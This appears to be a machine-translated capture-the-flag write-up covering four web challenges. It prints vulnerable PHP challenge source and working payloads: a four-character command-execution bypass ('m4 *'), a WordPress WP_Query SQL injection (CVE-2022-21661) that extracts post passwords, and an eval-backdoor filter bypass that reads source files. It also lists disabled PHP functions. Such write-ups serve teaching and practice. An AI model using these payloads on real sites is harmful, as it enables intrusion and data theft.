Preface

Took time to look at web

para-code

4 length rce Write permission required , But the title has no permission to write , I can only blast the following orders

<?php
require __DIR__ . '/flag.php';
if (!isset($_GET['start'])){
    
    show_source(__FILE__);
    exit;
} 

$blackList = array(
  'ss','sc','aa','od','pr','pw','pf','ps','pa','pd','pp','po','pc','pz','pq','pt','pu','pv','pw','px','ls','dd','nl','nk','df','wc', 'du'
);

$valid = true;
foreach($blackList as $blackItem)
{
    
    if(strpos($_GET['start'], $blackItem) !== false)
    {
    
         $valid = false;
         break;
    }
}

if(!$valid)
{
    
  show_source(__FILE__);
  exit;
}

// This will return output only for id and ps. 
if (strlen($_GET['start']) < 5){
    
  echo shell_exec($_GET['start']);
} else {
    
  echo "Please enter a valid command";
}

if (False) {
    
  echo $flag;
}
?>

Finally, the blasting result is ?start=m4 *

linux m4 command

m4 Copy input to output , Expand the macro at the same time . Macros can be embedded or user-defined . In addition to being able to expand macros ,m4 There are also some built-in functions , Used to reference files , perform Unix command , Integer operation , Text operation , Cycle, etc . m4 It can be used as the front end of the compiler or as a macro processor .

research-it

One wordpress Site , After scanning /wp-content/plugins/ There is directory traversal

wp-content The following file directory

1. languages( Language pack , Chinese or something , You can install other language packs , Put it here, too )
2. plugins( Various plug-ins , such as 301 plug-in unit , Reply to the plug-in , Automatic mail plug-ins )
3. themes( Latest version wordpress The default is 3 All the themes are put here , The theme you installed is also here )

wp-content That's all for now 3 A catalog

/wp-includes/wlwmanifest.xml Get the background address

Tried some basic wordpress All of the vulnerabilities failed , breakthrough hello.php There are backup files to view the source code hello.php~

Found out WP_Query , A while ago, a sql Inject CVE-2022–21661

Analyze the article ： some Press The core framework WP_Query SQL Injection vulnerability analysis (CVE-2022–21661)

Find out add Of action

It's a little different , Online poc Is to use json Way into , Change here and you're done

payload：

action=Taxonomy&args[tax_query][0][field]=term_taxonomy_id&args[tax_query][0][terms][0]=1) and extractvalue(1,co
ncat(0x5e,(select substr((select group_concat(post_password) from wp_posts),10,40)),0x5e))#

casual-defence

There was no clue at first , Try apache The vulnerability of the has not been successful , Finally through dirsearch A doubtful point has been found , visit index.php Return to this page , Description the backend is php, Then combine with the topic , Website is hacked , Suspected backdoor function , I just need myself fuzz Parameters , Manually fuzz, found cmd Parameter command execution , use Wfuzz Parameters can also be given

Disable_function:

eval,passthru,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,shell_exec,get_defined_functions

The discovery was carried out ban 了 eval, Then it is used assert,php7 In the environment , No reference file , Reverse is OK

payload

?cmd=var_dump(file_get_contents(end(current(get_defined_vars()))));&y0ng=index.php

Source code ：

<?php
$note = "most of execution functions where blocked within the php.ini :D";
	
if (!isset($_GET['cmd'])){
    
	echo 'Hacked by NotRealH4ck3rN4m3! You shall not elevate me!';
} 
	
if(preg_match('/system|exec|passthru|shell|[\"\'\\\$\%\.\[\]\{\}\`\!\*\/]/', $_GET['cmd'])){
    
	echo "Try Harder!";
} else {
    
	eval($_GET['cmd']);
}
$flag = "CTF{40c7bf1cd2186ce4f14720c4243f1e276a8abe49004b788921828f13a026c5f1}";
?>

And then I found out that eval , No ban Did you? , The reason found online ：

stay php.ini in , There is one disable_functions project , Can be used to set to disable php function . But it cannot be disabled eval function . Because eval Not at all php Function of , It is zend Function of .

To disable eval The function needs to use Suhosin php plug-in unit ,php Ban eval( ) function

it-support

Laravel v8.83.0 (PHP v7.3.33)

home page ：

Submit packet capture ：

measure xss, But it seems useless

Observe the resulting ticket

This is ticket This is the format of ：TK-(year)(month)(day)(minutes)(second)-1xxx

When I refresh the page, only the time and status change , There is a difference of about twoorthree seconds , Status from penting Turn into closed

And then there's the explosion ticket Seconds and later 1xxx, I didn't explode